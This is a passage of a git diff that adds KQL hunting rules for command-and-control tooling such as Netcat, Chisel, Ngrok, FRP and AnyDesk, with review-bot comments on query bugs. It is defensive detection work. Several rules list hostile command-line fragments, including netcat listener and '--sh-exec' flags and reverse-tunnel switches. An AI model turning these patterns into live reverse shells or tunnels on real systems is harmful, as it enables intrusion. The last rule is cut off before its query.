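Review bot: The exclusion list on the Notion rule's `| where` line matches browsers by file name only (`InitiatingProcessFolderPath endswith "\\brave.exe"`, `"\\opera.exe"`, `"\\safari.exe"`, `"\\vivaldi.exe"`, ...), whereas the azurewebsites and dead-drop-resolver hunks earlier in this commit anchor the same browsers to their install directories. A file-name-only exclusion is the weakest form and is inconsistent within one commit; reusing the path-anchored patterns from those hunks (for example `InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\"`) would make the three rules agree. If the looser form is intentional because this rule is only level low, say so in a comment after `// Tags:`. The Notion rule's `| where` line begins on the previous source line.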
@@ -0,0 +1,10 @@
+// Title: PrintBrm ZIP Creation of Extraction
+// Author: frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_3proxy_execution.kql b/KQL/rules/Command and Control/pua_3proxy_execution.kql
new file mode 100644
index 00000000..94528c9e
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_3proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - 3Proxy Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects the use of 3proxy, a tiny free proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\3proxy.exe" or ProcessCommandLine contains ".exe -i127.0.0.1 -p" or ProcessVersionInfoFileDescription =~ "3proxy - tiny proxy server"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql
new file mode 100644
index 00000000..c9f1dbfa
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_chisel_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Chisel Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-09-13
+// Level: high
+// Description: Detects usage of the Chisel tunneling tool via the commandline arguments
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090.001
+// False Positives:
+// - Some false positives may occur with other tools with similar commandlines
+
+DeviceProcessEvents
+| where FolderPath endswith "\\chisel.exe" or ((ProcessCommandLine contains "exe client " or ProcessCommandLine contains "exe server ") and (ProcessCommandLine contains "-socks5" or ProcessCommandLine contains "-reverse" or ProcessCommandLine contains " r:" or ProcessCommandLine contains ":127.0.0.1:" or ProcessCommandLine contains "-tls-skip-verify " or ProcessCommandLine contains ":socks"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql
new file mode 100644
index 00000000..a1db24c2
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_fast_reverse_proxy_frp_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Fast Reverse Proxy (FRP) Execution
+// Author: frack113, Florian Roth
+// Date: 2022-09-02
+// Level: high
+// Description: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\frpc.ini" or (MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842" or SHA1 startswith "06DDC9280E1F1810677935A2477012960905942F" or SHA256 startswith "57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C") or (FolderPath endswith "\\frpc.exe" or FolderPath endswith "\\frps.exe")
\ No newline at end of file
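Review bot: The hash conditions in the `| where` clause use `startswith` with a complete digest (`MD5 startswith "7D9C233B8C9E3F0EA290D2B84593C842"` and the SHA1/SHA256 siblings), which reads as a prefix match although a full-length digest can only match exactly; `=~` (or `in~` for several values) states the intent and removes the temptation for a later editor to shorten a hash believing a prefix suffices. KQL's `startswith` and `=~` are both case-insensitive, so the lowercase hash columns match either way and the change is purely one of clarity, e.g. `MD5 =~ "7D9C233B8C9E3F0EA290D2B84593C842"`. The same pattern appears in the IOX, Nimgrab and NPS hunks.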
diff --git a/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql
new file mode 100644
index 00000000..9a56d33a
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_iox_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA- IOX Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where FolderPath endswith "\\iox.exe" or (ProcessCommandLine contains ".exe fwd -l " or ProcessCommandLine contains ".exe fwd -r " or ProcessCommandLine contains ".exe proxy -l " or ProcessCommandLine contains ".exe proxy -r ") or (MD5 startswith "9DB2D314DD3F704A02051EF5EA210993" or SHA1 startswith "039130337E28A6623ECF9A0A3DA7D92C5964D8DD" or SHA256 startswith "C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql
new file mode 100644
index 00000000..3b02ed3f
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_netcat_suspicious_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Netcat Suspicious Execution
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2021-07-21
+// Level: high
+// Description: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1095
+// False Positives:
+// - Legitimate ncat use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -lvp " or ProcessCommandLine contains " -lvnp" or ProcessCommandLine contains " -l -v -p " or ProcessCommandLine contains " -lv -p " or ProcessCommandLine contains " -l --proxy-type http " or ProcessCommandLine contains " -vnl --exec " or ProcessCommandLine contains " -vnl -e " or ProcessCommandLine contains " --lua-exec " or ProcessCommandLine contains " --sh-exec ") or (FolderPath endswith "\\nc.exe" or FolderPath endswith "\\ncat.exe" or FolderPath endswith "\\netcat.exe")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/Command and Control/pua_ngrok_execution.kql
new file mode 100644
index 00000000..49f5032c
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_ngrok_execution.kql
@@ -0,0 +1,15 @@
+// Title: PUA - Ngrok Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-14
+// Level: high
+// Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.
+Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572
+// False Positives:
+// - Another tool that uses the command line switches of Ngrok
+// - Ngrok http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " tcp 139" or ProcessCommandLine contains " tcp 445" or ProcessCommandLine contains " tcp 3389" or ProcessCommandLine contains " tcp 5985" or ProcessCommandLine contains " tcp 5986") or (ProcessCommandLine contains " start " and ProcessCommandLine contains "--all" and ProcessCommandLine contains "--config" and ProcessCommandLine contains ".yml") or ((ProcessCommandLine contains " tcp " or ProcessCommandLine contains " http " or ProcessCommandLine contains " authtoken ") and FolderPath endswith "ngrok.exe") or (ProcessCommandLine contains ".exe authtoken " or ProcessCommandLine contains ".exe start --all")
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_nimgrab_execution.kql b/KQL/rules/Command and Control/pua_nimgrab_execution.kql
new file mode 100644
index 00000000..796c423b
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_nimgrab_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - Nimgrab Execution
+// Author: frack113
+// Date: 2022-08-28
+// Level: high
+// Description: Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate use of Nim on a developer systems
+
+DeviceProcessEvents
+| where (MD5 startswith "2DD44C3C29D667F5C0EF5F9D7C7FFB8B" or SHA256 startswith "F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559") or FolderPath endswith "\\nimgrab.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql
new file mode 100644
index 00000000..3724f9df
--- /dev/null
+++ b/KQL/rules/Command and Control/pua_nps_tunneling_tool_execution.kql
@@ -0,0 +1,12 @@
+// Title: PUA - NPS Tunneling Tool Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-08
+// Level: high
+// Description: Detects the use of NPS, a port forwarding and intranet penetration proxy server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -server=" and ProcessCommandLine contains " -vkey=" and ProcessCommandLine contains " -password=") or ProcessCommandLine contains " -config=npc" or (MD5 startswith "AE8ACF66BFE3A44148964048B826D005" or SHA1 startswith "CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181" or SHA256 startswith "5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856") or FolderPath endswith "\\npc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/Command and Control/quickassist_execution.kql
new file mode 100644
index 00000000..3cc1f417
--- /dev/null
+++ b/KQL/rules/Command and Control/quickassist_execution.kql
@@ -0,0 +1,13 @@
+// Title: QuickAssist Execution
+// Author: Muhammad Faisal (@faisalusuf)
+// Date: 2024-12-19
+// Level: low
+// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use of Quick Assist in the environment.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\QuickAssist.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql
new file mode 100644
index 00000000..4fc16d9e
--- /dev/null
+++ b/KQL/rules/Command and Control/rdp_over_reverse_ssh_tunnel.kql
@@ -0,0 +1,10 @@
+// Title: RDP Over Reverse SSH Tunnel
+// Author: Samir Bousseaden
+// Date: 2019-02-16
+// Level: high
+// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
+
+DeviceNetworkEvents
+| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql
new file mode 100644
index 00000000..bafdc6f3
--- /dev/null
+++ b/KQL/rules/Command and Control/rdp_to_http_or_https_target_ports.kql
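Review bot: `ipv4_is_in_range(RemoteIP, "::1/128")` in the `| where` clause can never match: the function only parses IPv4 notation and returns null for an IPv6 range, so the IPv6-loopback half of the original rule is silently dropped and only the `127.0.0.0/8` branch is live. Replace that branch with `RemoteIP == "::1"` (or `ipv6_is_in_range(RemoteIP, "::1/128")`) and keep `ipv4_is_in_range` for the IPv4 range, e.g. `| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or RemoteIP == "::1") and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)`.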
@@ -0,0 +1,10 @@
+// Title: RDP to HTTP or HTTPS Target Ports
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-29
+// Level: high
+// Description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1572, attack.lateral-movement, attack.t1021.001, car.2013-07-002
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
new file mode 100644
index 00000000..1d75ae98
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
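Review bot: `RemotePort in~ ("80", "443")` compares the numeric `RemotePort` column against string literals with a string operator, while the same clause compares `LocalPort == 3389` numerically; depending on how Advanced Hunting coerces it this is either a type error or a comparison that never matches, and either way the rule is inconsistent with itself. Write the port test as `RemotePort in (80, 443)` so both port checks use the column's integer type.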
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - AnyDesk Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
new file mode 100644
index 00000000..a8ad8d6d
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - Anydesk Execution From Suspicious Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-05-20
+// Level: high
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use of AnyDesk from a non-standard folder
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH") and (not((FolderPath contains "\\AppData\\" or FolderPath contains "Program Files (x86)\\AnyDesk" or FolderPath contains "Program Files\\AnyDesk")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql
new file mode 100644
index 00000000..88180709
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_piped_password_via_cli.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - AnyDesk Piped Password Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-28
+// Level: medium
+// Description: Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate piping of the password to anydesk
+// - Some FP could occur with similar tools that uses the same command line '--set-password'
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/c " and ProcessCommandLine contains "echo " and ProcessCommandLine contains ".exe --set-password"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql
new file mode 100644
index 00000000..ad374038
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_silent_installation.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - AnyDesk Silent Installation
+// Author: Ján Trenčanský
+// Date: 2021-08-06
+// Level: high
+// Description: Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate deployment of AnyDesk
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--install" and ProcessCommandLine contains "--start-with-win" and ProcessCommandLine contains "--silent"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
new file mode 100644
index 00000000..2bfbcc78
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - GoToAssist Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "GoTo Opener" or ProcessVersionInfoProductName =~ "GoTo Opener" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
new file mode 100644
index 00000000..82465ebb
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - LogMeIn Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "LMIGuardianSvc" or ProcessVersionInfoProductName =~ "LMIGuardianSvc" or ProcessVersionInfoCompanyName =~ "LogMeIn, Inc."
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
new file mode 100644
index 00000000..a761d102
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - MeshAgent Command Execution via MeshCentral
+// Author: @Kostastsale
+// Date: 2024-09-22
+// Level: medium
+// Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
+MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - False positives can be found in environments using MeshAgent for remote management, analysis should prioritize the grandparent process, MeshAgent.exe, and scrutinize the resulting child processes triggered by any suspicious interactive commands directed at the target host.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\meshagent.exe"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
new file mode 100644
index 00000000..b361e753
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - NetSupport Execution
+// Author: frack113
+// Date: 2022-09-25
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "NetSupport Client Configurator" or ProcessVersionInfoProductName =~ "NetSupport Remote Control" or ProcessVersionInfoCompanyName =~ "NetSupport Ltd" or ProcessVersionInfoOriginalFileName =~ "PCICFGUI.EXE"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
new file mode 100644
index 00000000..fb076c21
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - Potential MeshAgent Execution - MacOS
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+Historical data shows that threat actors rename MeshAgent binary to evade detection.
+Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
new file mode 100644
index 00000000..1f6df197
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - Potential MeshAgent Execution - Windows
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: medium
+// Description: Detects potential execution of MeshAgent which is a tool used for remote access.
+Historical data shows that threat actors rename MeshAgent binary to evade detection.
+Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Environments that legitimately use MeshAgent
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--meshServiceName"
\ No newline at end of file
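Review bot: The macOS and Windows variants of this rule are identical apart from the title — both run `DeviceProcessEvents | where ProcessCommandLine contains "--meshServiceName"` with no platform constraint — so every match will raise two alerts for the same event. Either keep a single file, or scope each one, for example `| where FolderPath startswith "/"` for the macOS rule and `| where FolderPath contains "\\"` for the Windows one, or a join on `DeviceInfo` to filter on `OSPlatform`. The Renamed MeshAgent pair that follows appears to have the mirror-image problem: each exclusion only knows its own platform's agent path (`/meshagent` vs `\\meshagent.exe`), so a legitimately named agent on the other OS presumably matches as "renamed"; the same platform scoping would fix that.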
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
new file mode 100644
index 00000000..81fbccc5
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Renamed MeshAgent Execution - MacOS
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: high
+// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
+RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not((FolderPath endswith "/meshagent" or FolderPath endswith "/meshagent_osx64")))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql
new file mode 100644
index 00000000..c6254295
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - Renamed MeshAgent Execution - Windows
+// Author: Norbert Jaśniewicz (AlphaSOC)
+// Date: 2025-05-19
+// Level: high
+// Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
+RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--meshServiceName" or ProcessVersionInfoOriginalFileName contains "meshagent") and (not(FolderPath endswith "\\meshagent.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql
new file mode 100644
index 00000000..0a95d2e4
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql
@@ -0,0 +1,15 @@
+// Title: Remote Access Tool - ScreenConnect Execution
+// Author: frack113
+// Date: 2022-02-13
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - Legitimate usage of the tool
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "ScreenConnect Service" or ProcessVersionInfoProductName =~ "ScreenConnect" or ProcessVersionInfoCompanyName =~ "ScreenConnect Software"
\ No newline at end of file
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
new file mode 100644
index 00000000..28c1bf37
--- /dev/null
+++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @Kostastsale
+// Date: 2022-02-25
+// Level: medium
+// Description: Detects potentially suspicious child processes launched via the ScreenConnect client service.
+
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+// - If the script being executed make use of any of the utilities mentioned in the detection then they should filtered out or allowed.
+
+DeviceProcessEvents
